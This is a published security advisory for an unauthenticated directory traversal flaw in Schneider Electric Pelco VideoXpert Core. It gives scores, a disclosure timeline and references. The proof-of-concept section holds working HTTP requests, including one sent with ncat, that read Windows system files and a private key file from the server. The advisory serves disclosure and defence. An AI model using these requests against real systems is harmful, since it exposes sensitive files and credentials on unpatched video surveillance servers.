Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal

2017-07-10 00:00:00
Gjoko Krstic
zeroscience.mk

CVSS2: 5 Medium (AV:N/AC:L/Au:N/C:P/I:N/A:N)
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: NONE
  Availability Impact: NONE

CVSS3: 5.8 Medium (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N)
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: CHANGED
  Confidentiality Impact: LOW
  Integrity Impact: NONE
  Availability Impact: NONE

AI Score: 6.2 Medium (Confidence: High)

EPSS: 0.001 Low (Percentile: 40.1%)

Title: Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal
Advisory ID: ZSL-2017-5419
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information
Risk: (4/5)
Release Date: 10.07.2017

Summary

VideoXpert is a video management solution designed for scalability, fitting the needs of surveillance operations of any size. VideoXpert Ultimate can also aggregate other VideoXpert systems, tying multiple video management systems into a single interface.

Description

Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.

Vendor

Schneider Electric SE - <https://www.pelco.com>

Affected Version

2.0.41
1.14.7
1.12.105

Tested On

Microsoft Windows 7 Professional SP1 (EN)

Vendor Status

[05.04.2017] Vulnerabilities discovered.
[28.04.2017] Vendor contacted.
[09.07.2017] No response from the vendor.
[10.07.2017] Public security advisory released.
[05.12.2017] Vendor releases version 2.1 to address this issue.

PoC

pelcovideoxpert_fd.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.exploit-db.com/exploits/42311/>
[2] <https://cxsecurity.com/issue/WLB-2017070077>
[3] <https://packetstormsecurity.com/files/143317>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/129663>
[5] <https://www.schneider-electric.com/b2b/en/support/cybersecurity/security-notifications.jsp>
[6] <https://www.schneider-electric.com/en/download/document/SEVD-2017-339-01/>
[7] SEVD-2017-339-01 - Pelco VideoXpert Enterprise (.pdf)
[8] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9965>
[9] <https://ics-cert.us-cert.gov/advisories/ICSA-17-355-02>
[10] <https://www.securityfocus.com/bid/102338>
[11] <http://securityaffairs.co/wordpress/67108/hacking/pelco-videoxpert-flaws.html>
[12] <https://www.cybersecurity-help.cz/vdb/SB2017122204>
[13] <https://nvd.nist.gov/vuln/detail/CVE-2017-9965>
[14] <http://www.isssource.com/schneider-clears-pelco-vulnerabilities/>
[15] <http://www.securityweek.com/schneider-electric-patches-flaws-pelco-video-management-system>

Changelog

[10.07.2017] - Initial release
[01.08.2017] - Added reference [1], [2] and [3]
[07.08.2017] - Added reference [4]
[05.12.2017] - Added vendor status
[13.12.2017] - Added reference [5], [6], [7] and [8]
[13.01.2018] - Added reference [9], [10], [11], [12], [13], [14] and [15]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal


Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: 2.0.41
                  1.14.7
                  1.12.105

Summary: VideoXpert is a video management solution designed for
scalability, fitting the needs of surveillance operations of any size.
VideoXpert Ultimate can also aggregate other VideoXpert systems,
tying multiple video management systems into a single interface.

Desc: Pelco VideoXpert suffers from a directory traversal vulnerability.
Exploiting this issue will allow an unauthenticated attacker to
view arbitrary files within the context of the web server.


Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Jetty(9.2.6.v20141205)
           MongoDB/3.2.10


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5419
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php


05.04.2017

--


PoC:
----

GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close


HTTP/1.1 200 OK
Date: Wed, 05 Apr 2017 13:27:39 GMT
Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
ETag: 1247548162000
Content-Length: 403
Connection: close

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo


------


GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\db\security\key.pem HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close


HTTP/1.1 200 OK
Date: Thu, 06 Apr 2017 11:59:07 GMT
Last-Modified: Wed, 05 Apr 2017 12:58:36 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
ETag: 1491397116000
Content-Length: 9
Connection: close

T0ps3cret


------


bash-4.4$ cat pelco_system_ini.txt
GET /portal//..\\\..\\\..\\\..\\\windows\system.ini HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

bash-4.4$ ncat -v -n 172.19.0.198 80 < pelco_system_ini.txt
Ncat: Version 7.40 ( https://nmap.org/ncat )
Ncat: Connected to 172.19.0.198:80.
HTTP/1.1 200 OK
Date: Thu, 06 Apr 2017 12:30:01 GMT
Last-Modified: Wed, 10 Jun 2009 21:08:04 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
ETag: 1244668084000
Content-Length: 219
Connection: close

; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]
Ncat: 220 bytes sent, 460 bytes received in 0.03 seconds.
bash-4.4$ 

